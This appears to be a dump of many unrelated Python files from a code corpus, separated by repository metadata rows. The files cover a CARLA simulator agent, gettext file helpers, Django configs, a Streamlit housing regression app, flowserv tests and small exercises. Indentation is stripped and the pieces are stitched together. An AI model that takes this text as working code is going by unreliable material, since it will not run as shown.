with CarlaSyncMode(world, sensors) as sync_mode:
while True:
data = sync_mode.tick(timeout=1.0)
"""
def __init__(self, world, *sensors, **kwargs):
self.world = world
self.sensors = sensors
self.frame = None
self.delta_seconds = 1.0 / kwargs.get('fps', 20)
self._queues = []
self._settings = None
self.start()
def start(self):
self._settings = self.world.get_settings()
self.frame = self.world.apply_settings(carla.WorldSettings(
no_rendering_mode=False,
synchronous_mode=True,
fixed_delta_seconds=self.delta_seconds))
def make_queue(register_event):
q = queue.Queue()
register_event(q.put)
self._queues.append(q)
make_queue(self.world.on_tick)
for sensor in self.sensors:
make_queue(sensor.listen)
def tick(self, timeout):
self.frame = self.world.tick()
data = [self._retrieve_data(q, timeout) for q in self._queues]
assert all(x.frame == self.frame for x in data)
return data
def __exit__(self, *args, **kwargs):
self.world.apply_settings(self._settings)
def _retrieve_data(self, sensor_queue, timeout):
while True:
data = sensor_queue.get(timeout=timeout)
if data.frame == self.frame:
return data
def draw_image(surface, image, blend=False):
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
image_surface = pygame.surfarray.make_surface(array.swapaxes(0, 1))
if blend:
image_surface.set_alpha(100)
surface.blit(image_surface, (0, 0))
def get_font():
fonts = [x for x in pygame.font.get_fonts()]
default_font = 'ubuntumono'
font = default_font if default_font in fonts else fonts[0]
font = pygame.font.match_font(font)
return pygame.font.Font(font, 14)
def should_quit():
for event in pygame.event.get():
if event.type == pygame.QUIT:
return True
elif event.type == pygame.KEYUP:
if event.key == pygame.K_ESCAPE:
return True
return False
def clamp(value, minimum=0.0, maximum=100.0):
return max(minimum, min(value, maximum))
class Sun(object):
def __init__(self, azimuth, altitude):
self.azimuth = azimuth
self.altitude = altitude
self._t = 0.0
def tick(self, delta_seconds):
self._t += 0.008 * delta_seconds
self._t %= 2.0 * math.pi
self.azimuth += 0.25 * delta_seconds
self.azimuth %= 360.0
min_alt, max_alt = [20, 90]
self.altitude = 0.5 * (max_alt + min_alt) + 0.5 * (max_alt - min_alt) * math.cos(self._t)
def __str__(self):
return 'Sun(alt: %.2f, azm: %.2f)' % (self.altitude, self.azimuth)
class Storm(object):
def __init__(self, precipitation):
self._t = precipitation if precipitation > 0.0 else -50.0
self._increasing = True
self.clouds = 0.0
self.rain = 0.0
self.wetness = 0.0
self.puddles = 0.0
self.wind = 0.0
self.fog = 0.0
def tick(self, delta_seconds):
delta = (1.3 if self._increasing else -1.3) * delta_seconds
self._t = clamp(delta + self._t, -250.0, 100.0)
self.clouds = clamp(self._t + 40.0, 0.0, 90.0)
self.clouds = clamp(self._t + 40.0, 0.0, 60.0)
self.rain = clamp(self._t, 0.0, 80.0)
delay = -10.0 if self._increasing else 90.0
self.puddles = clamp(self._t + delay, 0.0, 85.0)
self.wetness = clamp(self._t * 5, 0.0, 100.0)
self.wind = 5.0 if self.clouds <= 20 else 90 if self.clouds >= 70 else 40
self.fog = clamp(self._t - 10, 0.0, 30.0)
if self._t == -250.0:
self._increasing = True
if self._t == 100.0:
self._increasing = False
def __str__(self):
return 'Storm(clouds=%d%%, rain=%d%%, wind=%d%%)' % (self.clouds, self.rain, self.wind)
class Weather(object):
def __init__(self, world, changing_weather_speed):
self.world = world
self.reset()
self.weather = world.get_weather()
self.changing_weather_speed = changing_weather_speed
self._sun = Sun(self.weather.sun_azimuth_angle, self.weather.sun_altitude_angle)
self._storm = Storm(self.weather.precipitation)
def reset(self):
weather_params = carla.WeatherParameters(sun_altitude_angle=90.)
self.world.set_weather(weather_params)
def tick(self):
self._sun.tick(self.changing_weather_speed)
self._storm.tick(self.changing_weather_speed)
self.weather.cloudiness = self._storm.clouds
self.weather.precipitation = self._storm.rain
self.weather.precipitation_deposits = self._storm.puddles
self.weather.wind_intensity = self._storm.wind
self.weather.fog_density = self._storm.fog
self.weather.wetness = self._storm.wetness
self.weather.sun_azimuth_angle = self._sun.azimuth
self.weather.sun_altitude_angle = self._sun.altitude
self.world.set_weather(self.weather)
def __str__(self):
return '%s %s' % (self._sun, self._storm)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--vision_size', type=int, default=84)
parser.add_argument('--vision_fov', type=int, default=90)
parser.add_argument('--weather', default=False, action='store_true')
parser.add_argument('--frame_skip', type=int, default=1),
parser.add_argument('--steps', type=int, default=100000)
parser.add_argument('--multiagent', default=False, action='store_true'),
parser.add_argument('--lane', type=int, default=0)
parser.add_argument('--lights', default=False, action='store_true')
args = parser.parse_args()
return args
class LocalPlannerModified(LocalPlanner):
def __del__(self):
pass # otherwise it deletes our vehicle object
def run_step(self):
return super().run_step(debug=False) # otherwise by default shows waypoints, that interfere with our camera
class RoamingAgent(Agent):
"""
RoamingAgent implements a basic agent that navigates scenes making random
choices when facing an intersection.
This agent respects traffic lights and other vehicles.
NOTE: need to re-create after each env reset
"""
def __init__(self, env):
"""
:param vehicle: actor to apply to local planner logic onto
"""
vehicle = env.vehicle
follow_traffic_lights = env.follow_traffic_lights
super(RoamingAgent, self).__init__(vehicle)
self._proximity_threshold = 10.0 # meters
self._state = AgentState.NAVIGATING
self._local_planner = LocalPlannerModified(self._vehicle)
self._follow_traffic_lights = follow_traffic_lights
def compute_action(self):
action, traffic_light = self.run_step()
throttle = action.throttle
brake = action.brake
steer = action.steer
#print('tbsl:', throttle, brake, steer, traffic_light)
if brake == 0.0:
return np.array([throttle, steer])
else:
return np.array([-brake, steer])
def run_step(self):
"""
Execute one step of navigation.
:return: carla.VehicleControl
"""
# is there an obstacle in front of us?
hazard_detected = False
# retrieve relevant elements for safe navigation, i.e.: traffic lights and other vehicles
actor_list = self._world.get_actors()
vehicle_list = actor_list.filter("*vehicle*")
lights_list = actor_list.filter("*traffic_light*")
# check possible obstacles
vehicle_state, vehicle = self._is_vehicle_hazard(vehicle_list)
if vehicle_state:
self._state = AgentState.BLOCKED_BY_VEHICLE
hazard_detected = True
# check for the state of the traffic lights
traffic_light_color = self._is_light_red(lights_list)
if traffic_light_color == 'RED' and self._follow_traffic_lights:
self._state = AgentState.BLOCKED_RED_LIGHT
hazard_detected = True
if hazard_detected:
control = self.emergency_stop()
else:
self._state = AgentState.NAVIGATING
# standard local planner behavior
control = self._local_planner.run_step()
#print ('Action chosen: ', control)
return control, traffic_light_color
# override case class
def _is_light_red_europe_style(self, lights_list):
"""
This method is specialized to check European style traffic lights.
Only suitable for Towns 03 -- 07.
"""
ego_vehicle_location = self._vehicle.get_location()
ego_vehicle_waypoint = self._map.get_waypoint(ego_vehicle_location)
traffic_light_color = "NONE" # default, if no traffic lights are seen
for traffic_light in lights_list:
object_waypoint = self._map.get_waypoint(traffic_light.get_location())
if object_waypoint.road_id != ego_vehicle_waypoint.road_id or \
object_waypoint.lane_id != ego_vehicle_waypoint.lane_id:
continue
if is_within_distance_ahead(traffic_light.get_transform(),
self._vehicle.get_transform(),
self._proximity_threshold):
if traffic_light.state == carla.TrafficLightState.Red:
return "RED"
elif traffic_light.state == carla.TrafficLightState.Yellow:
traffic_light_color = "YELLOW"
elif traffic_light.state == carla.TrafficLightState.Green:
if traffic_light_color is not "YELLOW": # (more severe)
traffic_light_color = "GREEN"
else:
import pdb; pdb.set_trace()
# investigate https://carla.readthedocs.io/en/latest/python_api/#carlatrafficlightstate
return traffic_light_color
# override case class
def _is_light_red_us_style(self, lights_list, debug=False):
ego_vehicle_location = self._vehicle.get_location()
ego_vehicle_waypoint = self._map.get_waypoint(ego_vehicle_location)
traffic_light_color = "NONE" # default, if no traffic lights are seen
if ego_vehicle_waypoint.is_junction:
# It is too late. Do not block the intersection! Keep going!
return "JUNCTION"
if self._local_planner.target_waypoint is not None:
if self._local_planner.target_waypoint.is_junction:
min_angle = 180.0
sel_magnitude = 0.0
sel_traffic_light = None
for traffic_light in lights_list:
loc = traffic_light.get_location()
magnitude, angle = compute_magnitude_angle(loc,
ego_vehicle_location,
self._vehicle.get_transform().rotation.yaw)
if magnitude < 60.0 and angle < min(25.0, min_angle):
sel_magnitude = magnitude
sel_traffic_light = traffic_light
min_angle = angle
if sel_traffic_light is not None:
if debug:
print('=== Magnitude = {} | Angle = {} | ID = {}'.format(
sel_magnitude, min_angle, sel_traffic_light.id))
if self._last_traffic_light is None:
self._last_traffic_light = sel_traffic_light
if self._last_traffic_light.state == carla.TrafficLightState.Red:
return "RED"
elif self._last_traffic_light.state == carla.TrafficLightState.Yellow:
traffic_light_color = "YELLOW"
elif self._last_traffic_light.state == carla.TrafficLightState.Green:
if traffic_light_color is not "YELLOW": # (more severe)
traffic_light_color = "GREEN"
else:
import pdb; pdb.set_trace()
# investigate https://carla.readthedocs.io/en/latest/python_api/#carlatrafficlightstate
else:
self._last_traffic_light = None
return traffic_light_color
if __name__ == '__main__':
# example call:
# ./PythonAPI/util/config.py --map Town01 --delta-seconds 0.05
# python PythonAPI/carla/agents/navigation/data_collection_agent.py --vision_size 256 --vision_fov 90 --steps 10000 --weather --lights
args = parse_args()
env = CarlaEnv(args)
try:
done = False
while not done:
action, traffic_light_color = env.compute_action()
next_obs, reward, done, info = env.step(action, traffic_light_color)
print ('Reward: ', reward, 'Done: ', done, 'Location: ', env.vehicle.get_location())
if done:
# env.reset_init()
# env.reset()
done = False
finally:
env.finish()
| 36.34632 | 138 | 0.632861 | 11,283 | 0.671927 | 0 | 0 | 0 | 0 | 0 | 0 | 3,600 | 0.214388 |
2189e908a5d40835988cf4b8179b93819c50451d | 2,386 | py | Python | wren/pomo.py | kthy/wren | 62e9439ea82a1d984f07fa8cd00421e0e640196f | [
"MIT"
] | 1 | 2021-06-04T07:15:02.000Z | 2021-06-04T07:15:02.000Z | wren/pomo.py | kthy/wren | 62e9439ea82a1d984f07fa8cd00421e0e640196f | [
"MIT"
] | 9 | 2021-02-20T22:33:05.000Z | 2021-04-12T17:35:48.000Z | wren/pomo.py | pyxy-dk/wren | 62e9439ea82a1d984f07fa8cd00421e0e640196f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Gettext manipulation methods."""
from os import remove
from os.path import exists
from pathlib import Path
from shutil import copyfile, copystat
from typing import Sequence
from filehash import FileHash
from polib import MOFile, POFile, mofile
from wren.change import Change
def apply_changes(mo_file: MOFile, changelist: Sequence[Change]) -> None:
"""Apply all changes in the provided list of changes to the given MOFile."""
for change in changelist:
change.apply(mo_file)
def backup_original_mo(wowsdir: str, locale: str) -> None:
"""Copy the original `global.mo` to `global.mo.original`."""
global_mo_path = _global_mo_path(wowsdir, locale)
backup_mo_path = _backup_mo_path(wowsdir, locale)
_copyfile_and_checksum(global_mo_path, backup_mo_path)
def convert_mo_to_po(wowsdir: str, locale: str, outputdir: str) -> POFile:
"""Save the MO file for the given locale in PO format."""
mofile_path = Path(_global_mo_path(wowsdir, locale))
if not exists(mofile_path):
raise OSError(f"MO file for locale {locale} not found")
mof = mofile(mofile_path)
mof.save_as_pofile(f"{outputdir}/{mofile_path.stem}_{locale}.po")
def get_mo(wowsdir: str, locale: str) -> MOFile:
"""Open and return the global MO file in the given directory."""
return mofile(_global_mo_path(wowsdir, locale))
def restore_original_mo(wowsdir: str, locale: str) -> None:
"""Reinstate the original `global.mo` from `global.mo.original`."""
global_mo_path = _global_mo_path(wowsdir, locale)
backup_mo_path = _backup_mo_path(wowsdir, locale)
if exists(backup_mo_path):
_copyfile_and_checksum(backup_mo_path, global_mo_path)
remove(backup_mo_path)
def _copyfile_and_checksum(from_path, to_path) -> None:
"""Copy a file from from_path to to_path.
Raises OSError if the new file's checksum doesn't match the original."""
copyfile(from_path, to_path)
copystat(from_path, to_path)
hasher = FileHash("md5")
if hasher.hash_file(from_path) != hasher.hash_file(to_path):
raise OSError("Copy failed, hash mismatch detected")
def _backup_mo_path(wowsdir: str, locale: str) -> str:
return f"{_global_mo_path(wowsdir, locale)}.original"
def _global_mo_path(wowsdir: str, locale: str) -> str:
return f"{wowsdir}/res/texts/{locale}/LC_MESSAGES/global.mo"
| 34.57971 | 80 | 0.725482 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 727 | 0.304694 |
218b02aeb89c1d716160e75933fbb97fec67090f | 199 | py | Python | mysite/polls/urls.py | cs-fullstack-fall-2018/django-intro1-psanon19 | 0ae36780fd664313a011e7a219bc401b158fe93f | [
"Apache-2.0"
] | null | null | null | mysite/polls/urls.py | cs-fullstack-fall-2018/django-intro1-psanon19 | 0ae36780fd664313a011e7a219bc401b158fe93f | [
"Apache-2.0"
] | null | null | null | mysite/polls/urls.py | cs-fullstack-fall-2018/django-intro1-psanon19 | 0ae36780fd664313a011e7a219bc401b158fe93f | [
"Apache-2.0"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('language/', views.language),
path('system/', views.system),
path('ide/', views.ide),
path('', views.nothing)
] | 19.9 | 38 | 0.638191 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 28 | 0.140704 |
218b26291a3fa107e3de76aeb9676ea1fe58456c | 5,908 | py | Python | Boston_House_Prices.py | Anuska-Ghosh2002/bostonproj | fa3e55ea8417d58a84a66b11dc093d106bd10c79 | [
"MIT"
] | null | null | null | Boston_House_Prices.py | Anuska-Ghosh2002/bostonproj | fa3e55ea8417d58a84a66b11dc093d106bd10c79 | [
"MIT"
] | null | null | null | Boston_House_Prices.py | Anuska-Ghosh2002/bostonproj | fa3e55ea8417d58a84a66b11dc093d106bd10c79 | [
"MIT"
] | null | null | null | import streamlit as st
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
from sklearn.datasets import load_boston
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
# title
st.title('Linear regression on Boston house prices')
# Read the dataset
dataset = load_boston()
df = pd.DataFrame(dataset.data)
# Assign the columns into df
df.columns = dataset.feature_names
# Assign the target variable(house prices)
df["PRICES"] = dataset.target
# Show the table data
if st.checkbox('Show the dataset as table data'):
st.dataframe(df)
# Explanatory variable
FeaturesName = [\
#-- "Crime occurrence rate per unit population by town"
"CRIM",\
#-- "Percentage of 25000-squared-feet-area house"
'ZN',\
#-- "Percentage of non-retail land area by town"
'INDUS',\
#-- "Index for Charlse river: 0 is near, 1 is far"
'CHAS',\
#-- "Nitrogen compound concentration"
'NOX',\
#-- "Average number of rooms per residence"
'RM',\
#-- "Percentage of buildings built before 1940"
'AGE',\
#-- 'Weighted distance from five employment centers'
"DIS",\
##-- "Index for easy access to highway"
'RAD',\
##-- "Tax rate per $100,000"
'TAX',\
##-- "Percentage of students and teachers in each town"
'PTRATIO',\
##-- "1000(Bk - 0.63)^2, where Bk is the percentage of Black people"
'B',\
##-- "Percentage of low-class population"
'LSTAT',\
]
# Check an exmple, "Target" vs each variable
if st.checkbox('Show the relation between "Target" vs each variable'):
checked_variable = st.selectbox(
'Select one variable:',
FeaturesName
)
# Plot
fig, ax = plt.subplots(figsize=(5, 3))
ax.scatter(x=df[checked_variable], y=df["PRICES"])
plt.xlabel(checked_variable)
plt.ylabel("PRICES")
st.pyplot(fig)
"""
## Preprocessing
"""
# Select the variables NOT to be used
Features_chosen = []
Features_NonUsed = st.multiselect(
'Select the variables NOT to be used',
FeaturesName)
df = df.drop(columns=Features_NonUsed)
# Perform the logarithmic transformation
left_column, right_column = st.beta_columns(2)
bool_log = left_column.radio(
'Perform the logarithmic transformation?',
('No','Yes')
)
df_log, Log_Features = df.copy(), []
if bool_log == 'Yes':
Log_Features = right_column.multiselect(
'Select the variables you perform the logarithmic transformation',
df.columns
)
# Perform logarithmic transformation
df_log[Log_Features] = np.log(df_log[Log_Features])
# Perform the standardization
left_column, right_column = st.beta_columns(2)
bool_std = left_column.radio(
'Perform the standardization?',
('No','Yes')
)
df_std = df_log.copy()
if bool_std == 'Yes':
Std_Features_chosen = []
Std_Features_NonUsed = right_column.multiselect(
'Select the variables NOT to be standardized (categorical variables)',
df_log.drop(columns=["PRICES"]).columns
)
for name in df_log.drop(columns=["PRICES"]).columns:
if name in Std_Features_NonUsed:
continue
else:
Std_Features_chosen.append(name)
# Perform standardization
sscaler = preprocessing.StandardScaler()
sscaler.fit(df_std[Std_Features_chosen])
df_std[Std_Features_chosen] = sscaler.transform(df_std[Std_Features_chosen])
"""
### Split the dataset
"""
left_column, right_column = st.beta_columns(2)
test_size = left_column.number_input(
'Validation-dataset size (rate: 0.0-1.0):',
min_value=0.0,
max_value=1.0,
value=0.2,
step=0.1,
)
random_seed = right_column.number_input('Set random seed (0-):',
value=0, step=1,
min_value=0)
X_train, X_val, Y_train, Y_val = train_test_split(
df_std.drop(columns=["PRICES"]),
df_std['PRICES'],
test_size=test_size,
random_state=random_seed
)
# Create a regression-model instance
regressor = LinearRegression()
regressor.fit(X_train, Y_train)
Y_pred_train = regressor.predict(X_train)
Y_pred_val = regressor.predict(X_val)
# Inverse logarithmic transformation if necessary
if "PRICES" in Log_Features:
Y_pred_train, Y_pred_val = np.exp(Y_pred_train), np.exp(Y_pred_val)
Y_train, Y_val = np.exp(Y_train), np.exp(Y_val)
"""
## Show the result
### Check R2 socre
"""
R2 = r2_score(Y_val, Y_pred_val)
st.write(f'R2 score: {R2:.2f}')
"""
### Plot the result
"""
left_column, right_column = st.beta_columns(2)
show_train = left_column.radio(
'Show the training dataset:',
('Yes','No')
)
show_val = right_column.radio(
'Show the validation dataset:',
('Yes','No')
)
# default axis range
y_max_train = max([max(Y_train), max(Y_pred_train)])
y_max_val = max([max(Y_val), max(Y_pred_val)])
y_max = int(max([y_max_train, y_max_val]))
# interactive axis range
left_column, right_column = st.beta_columns(2)
x_min = left_column.number_input('x_min:',value=0,step=1)
x_max = right_column.number_input('x_max:',value=y_max,step=1)
left_column, right_column = st.beta_columns(2)
y_min = left_column.number_input('y_min:',value=0,step=1)
y_max = right_column.number_input('y_max:',value=y_max,step=1)
fig = plt.figure(figsize=(3, 3))
if show_train == 'Yes':
plt.scatter(Y_train, Y_pred_train,lw=0.1,color="r",label="training data")
if show_val == 'Yes':
plt.scatter(Y_val, Y_pred_val,lw=0.1,color="b",label="validation data")
plt.xlabel("PRICES",fontsize=8)
plt.ylabel("PRICES of prediction",fontsize=8)
plt.xlim(int(x_min), int(x_max)+5)
plt.ylim(int(y_min), int(y_max)+5)
plt.legend(fontsize=6)
plt.tick_params(labelsize=6)
st.pyplot(fig)
| 28.403846 | 82 | 0.676202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,048 | 0.346649 |
218bab7ad0514bef0bd2c2671ceec38449ab044f | 4,585 | py | Python | tests/controller/worker/test_worker_manager.py | scailfin/flowserv-core | 69376f84bae71b5699688bd213c34a6bf8806319 | [
"MIT"
] | 1 | 2020-02-13T18:57:53.000Z | 2020-02-13T18:57:53.000Z | tests/controller/worker/test_worker_manager.py | scailfin/flowserv-core | 69376f84bae71b5699688bd213c34a6bf8806319 | [
"MIT"
] | 46 | 2020-02-14T22:14:33.000Z | 2021-06-10T21:17:49.000Z | tests/controller/worker/test_worker_manager.py | scailfin/rob-core | 791383085181747cf41c30f6cd13f6762e438d8a | [
"MIT"
] | 3 | 2021-05-06T15:22:29.000Z | 2021-06-01T16:19:36.000Z | # This file is part of the Reproducible and Reusable Data Analysis Workflow
# Server (flowServ).
#
# Copyright (C) 2019-2021 NYU.
#
# flowServ is free software; you can redistribute it and/or modify it under the
# terms of the MIT License; see LICENSE file for more details.
"""Unit tests for the worker factory."""
import pytest
from flowserv.controller.worker.code import CodeWorker
from flowserv.controller.worker.docker import DockerWorker
from flowserv.controller.worker.manager import WorkerPool, Code, Docker, Notebook, Subprocess
from flowserv.controller.worker.notebook import NotebookEngine
from flowserv.controller.worker.subprocess import SubprocessWorker
from flowserv.model.workflow.step import CodeStep, ContainerStep, NotebookStep
import flowserv.error as err
@pytest.mark.parametrize(
'step,cls',
[
(ContainerStep(identifier='test', image='test'), SubprocessWorker),
(ContainerStep(identifier='test', image='test'), SubprocessWorker),
(CodeStep(identifier='test', func=lambda x: x), CodeWorker),
(NotebookStep(identifier='test', notebook='helloworld.ipynb'), NotebookEngine)
]
)
def test_get_default_worker(step, cls):
"""Test getting a default worker for a workflow step that has no manager
explicitly assigned to it.
"""
factory = WorkerPool(workers=[])
assert isinstance(factory.get_default_worker(step), cls)
def test_get_worker_error():
"""Test error when accessing worker with unknown identifier."""
step = ContainerStep(identifier='test', image='test')
factory = WorkerPool(workers=[], managers={'test': 'test'})
with pytest.raises(err.UnknownObjectError):
factory.get(step)
# Manipulate the worker type to get an error for unknown type.
doc = Code(identifier='test')
doc['type'] = 'unknown'
factory = WorkerPool(workers=[doc], managers={'test': 'test'})
with pytest.raises(ValueError):
factory.get(step)
# Manipulate the step type to get an error for unknown type.
step.step_type = 'unknown'
factory = WorkerPool(workers=[])
with pytest.raises(ValueError):
factory.get(step)
@pytest.mark.parametrize(
'doc,step,cls',
[
(Subprocess(identifier='test'), ContainerStep(identifier='test', image='test'), SubprocessWorker),
(Docker(identifier='test'), ContainerStep(identifier='test', image='test'), DockerWorker),
(Code(identifier='test'), CodeStep(identifier='test', func=lambda x: x), CodeWorker),
(Notebook(identifier='test'), NotebookStep(identifier='test', notebook='helloworld.ipynb'), NotebookEngine),
]
)
def test_get_worker_instance(doc, step, cls):
"""Test creating worker instances from specification documents."""
factory = WorkerPool(workers=[doc], managers={step.name: doc['name']})
worker = factory.get(step)
assert isinstance(worker, cls)
# Run twice to account for the cached object.
assert factory.get(step) == worker
def test_init_empty():
"""Test creating a worker factory from an empty dictionary."""
factory = WorkerPool(workers=list())
assert len(factory._workerspecs) == 0
def test_worker_spec_seriaization():
"""Test helper function for generating dictionary serializations for worker
specifications.
"""
# -- Config without additional arguments. ---------------------------------
doc = Code(identifier='D1')
assert doc == {'name': 'D1', 'type': 'code', 'env': [], 'variables': []}
doc = Docker(identifier='D1')
assert doc == {'name': 'D1', 'type': 'docker', 'env': [], 'variables': []}
doc = Subprocess(identifier='S1')
assert doc == {'name': 'S1', 'type': 'subprocess', 'env': [], 'variables': []}
# -- Config with arguments ------------------------------------------------
doc = Code(identifier='D1', volume='v1')
assert doc == {
'name': 'D1',
'type': 'code',
'env': [],
'variables': [],
'volume': 'v1'
}
vars = {'x': 1}
env = {'TEST_ENV': 'abc'}
doc = Docker(variables=vars, env=env, identifier='D2', volume='v1')
assert doc == {
'name': 'D2',
'type': 'docker',
'env': [{'key': 'TEST_ENV', 'value': 'abc'}],
'variables': [{'key': 'x', 'value': 1}],
'volume': 'v1'
}
doc = Subprocess(variables=vars, env=env, identifier='S2', volume='v1')
assert doc == {
'name': 'S2',
'type': 'subprocess',
'env': [{'key': 'TEST_ENV', 'value': 'abc'}],
'variables': [{'key': 'x', 'value': 1}],
'volume': 'v1'
}
| 37.892562 | 116 | 0.639258 | 0 | 0 | 0 | 0 | 1,440 | 0.314068 | 0 | 0 | 1,676 | 0.36554 |
218be87fd5642367ab0f3fbe799b44f1dfb60d9c | 640 | py | Python | pyconcz/announcements/migrations/0002_announcement_font_size.py | martinpucala/cz.pycon.org-2019 | 044337ed0e7f721e96d88da69511ba5493d127e6 | [
"MIT"
] | 6 | 2018-08-25T13:40:22.000Z | 2019-05-25T21:58:41.000Z | pyconcz/announcements/migrations/0002_announcement_font_size.py | Giraafje/cz.pycon.org-2019 | f7bfad2f0c0f98368e2f6163f7dce70335549a68 | [
"MIT"
] | 188 | 2018-08-26T06:53:50.000Z | 2022-02-12T04:04:36.000Z | pyconcz/announcements/migrations/0002_announcement_font_size.py | Giraafje/cz.pycon.org-2019 | f7bfad2f0c0f98368e2f6163f7dce70335549a68 | [
"MIT"
] | 15 | 2018-11-03T06:32:34.000Z | 2020-02-11T21:17:14.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-06-11 05:18
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('announcements', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='announcement',
name='font_size',
field=models.PositiveSmallIntegerField(default=1, help_text='1 (largest) to 4 (smallest)', validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(4)]),
),
]
| 29.090909 | 206 | 0.676563 | 451 | 0.704688 | 0 | 0 | 0 | 0 | 0 | 0 | 155 | 0.242188 |
218c1665960b6db6a4d4a313af360d78024780d3 | 896 | py | Python | docs/_ext/db_tables_extension.py | wdr-data/wdr-okr | 71c9e6e8d3521b1bb67d30310a93584389de2127 | [
"MIT"
] | 2 | 2021-07-28T08:46:13.000Z | 2022-01-19T17:05:48.000Z | docs/_ext/db_tables_extension.py | wdr-data/wdr-okr | 71c9e6e8d3521b1bb67d30310a93584389de2127 | [
"MIT"
] | 3 | 2020-11-10T23:34:17.000Z | 2021-03-31T16:19:21.000Z | docs/_ext/db_tables_extension.py | wdr-data/wdr-okr | 71c9e6e8d3521b1bb67d30310a93584389de2127 | [
"MIT"
] | null | null | null | """Custom Sphinx extension to inject database documentation into a ReST document."""
from docutils import nodes
from docutils.parsers.rst import Directive
import sys
import os
import inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
from database_tables import build_html # noqa: E402
class DbTables(Directive):
def run(self):
db_tables_html = build_html(
app_labels=["okr"],
html_top='<div id="db_tables">',
html_bottom="</div>",
)
paragraph_node = nodes.raw("", db_tables_html, format="html")
return [paragraph_node]
def setup(app):
app.add_directive("db_tables", DbTables)
return {
"version": "0.1",
"parallel_read_safe": True,
"parallel_write_safe": True,
}
| 24.216216 | 86 | 0.668527 | 306 | 0.341518 | 0 | 0 | 0 | 0 | 0 | 0 | 205 | 0.228795 |
218cc1a2784c43a8ecfb6c736b8023171e1890c1 | 149 | py | Python | vb2py/PythonCard/__init__.py | ceprio/xl_vb2py | 899fec0301140fd8bd313e8c80b3fa839b3f5ee4 | [
"BSD-3-Clause"
] | null | null | null | vb2py/PythonCard/__init__.py | ceprio/xl_vb2py | 899fec0301140fd8bd313e8c80b3fa839b3f5ee4 | [
"BSD-3-Clause"
] | null | null | null | vb2py/PythonCard/__init__.py | ceprio/xl_vb2py | 899fec0301140fd8bd313e8c80b3fa839b3f5ee4 | [
"BSD-3-Clause"
] | null | null | null | """
Created: 2001/08/05
Purpose: Turn PythonCard into a package
__version__ = "$Revision: 1.1.1.1 $"
__date__ = "$Date: 2001/08/06 19:53:11 $"
"""
| 16.555556 | 41 | 0.651007 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 148 | 0.993289 |
218d8e2910387226505ef85b9f0bcefc1939728c | 764 | py | Python | xschem/bandgap_opamp/test/bandgap_bmr_test_op.py | yrrapt/caravel_amsat_txrx_ic | 53bef4537447a623f93772092daeac67c4cb3d45 | [
"Apache-2.0"
] | 15 | 2020-12-13T12:33:15.000Z | 2022-02-17T18:09:25.000Z | xschem/bandgap_opamp/test/bandgap_bmr_test_op.py | yrrapt/caravel_amsat_txrx_ic | 53bef4537447a623f93772092daeac67c4cb3d45 | [
"Apache-2.0"
] | null | null | null | xschem/bandgap_opamp/test/bandgap_bmr_test_op.py | yrrapt/caravel_amsat_txrx_ic | 53bef4537447a623f93772092daeac67c4cb3d45 | [
"Apache-2.0"
] | 6 | 2021-01-02T05:52:21.000Z | 2022-03-28T06:55:07.000Z | import SpiceInterface
import TestUtilities
# create the test utility object
test_utilities_obj = TestUtilities.TestUtilities()
test_utilities_obj.netlist_generation('bandgap_opamp_test_op.sch', 'rundir')
# create the spice interface
spice_interface_obj = SpiceInterface.SpiceInterface(netlist_path="rundir/bandgap_opamp_test_op.spice")
spice_interface_obj.config['simulator']['shared'] = True
# add the op save parameters
devices = ['xbmr.XMcurr', 'xbmr.XMcurr1', 'xbmr.XM2', 'xbmr.XM3']
spice_interface_obj.insert_op_save(devices, ['vsat_marg'])
# run the simulation
spice_interface_obj.run_simulation()
# analyse the results
spice_interface_obj.plot_op_save(devices, ['vsat_marg'], 'temp-sweep')
['xbmr.XMcurr', 'xbmr.XMcurr1', 'xbmr.XM2', 'xbmr.XM3'] | 28.296296 | 102 | 0.789267 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 347 | 0.454188 |
218f388452a32732371a26acb9b1b26668fa0afb | 238 | py | Python | cloudmesh-exercises/cloudmesh-common-2.py | cybertraining-dsc/fa19-516-170 | 8746be5a89d897a155468303308efb71ce7ba849 | [
"Apache-2.0"
] | null | null | null | cloudmesh-exercises/cloudmesh-common-2.py | cybertraining-dsc/fa19-516-170 | 8746be5a89d897a155468303308efb71ce7ba849 | [
"Apache-2.0"
] | null | null | null | cloudmesh-exercises/cloudmesh-common-2.py | cybertraining-dsc/fa19-516-170 | 8746be5a89d897a155468303308efb71ce7ba849 | [
"Apache-2.0"
] | 1 | 2019-09-06T17:27:32.000Z | 2019-09-06T17:27:32.000Z | # fa19-516-170 E.Cloudmesh.Common.2
from cloudmesh.common.dotdict import dotdict
color = {"red": 255, "blue": 255, "green": 255, "alpha": 0}
color = dotdict(color)
print("A RGB color: ", color.red, color.blue, color.green, color.alpha) | 29.75 | 71 | 0.697479 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 75 | 0.315126 |
219042565e81d8c12997684eb40b91c86b416cb5 | 701 | py | Python | ex18.py | arunkumarang/python | 1960e285dfe2ef54d2e3ab37584bfef8b24ecca9 | [
"Apache-2.0"
] | null | null | null | ex18.py | arunkumarang/python | 1960e285dfe2ef54d2e3ab37584bfef8b24ecca9 | [
"Apache-2.0"
] | null | null | null | ex18.py | arunkumarang/python | 1960e285dfe2ef54d2e3ab37584bfef8b24ecca9 | [
"Apache-2.0"
] | null | null | null | #this one is like your scripts with argv
